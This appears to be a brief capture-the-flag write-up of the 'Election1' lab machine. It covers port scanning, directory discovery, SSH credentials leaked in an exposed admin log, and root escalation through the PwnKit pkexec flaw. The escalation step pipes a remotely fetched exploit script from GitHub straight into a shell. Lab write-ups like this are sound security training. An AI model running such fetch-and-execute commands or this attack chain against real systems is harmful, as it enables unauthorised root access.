ELECTION1

intermediate machine.

INITIAL SCAN

**Found 2 Open Ports: 22, 80


PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61

Then scanning using gobuster gave me robots.txt -> election directory which was hosting an online election system.

After further reconnaissance, I obtained a system log with some credentials

http://192.168.154.211/election/admin/logs/

INITIAL FOOTHOLD

Input:

They were SSH credentials. After that, I ran the following

sudo -l

User 'love' cannot run the command with sudo. Soon after reading the linpeas.sh output, I realized it was using an older version of pkexec, and from there, I escalated :

love@election:~$ pkexec --version
pkexec version 0.105
love@election:~$ sh -c "$(curl -fSSL https://raw.githubusercontent.com/ly4k/PwnKit/main/Pwnkit.sh)"
root@election:/home/love# cat /root/root.txt
root@election:/home/love# cd /root
root@election:~# ls
Desktop Documents Downloads Music Pictures Public Templates Videos proof.txt
root@election:~# cat proof.txt

Last updated 9 months ago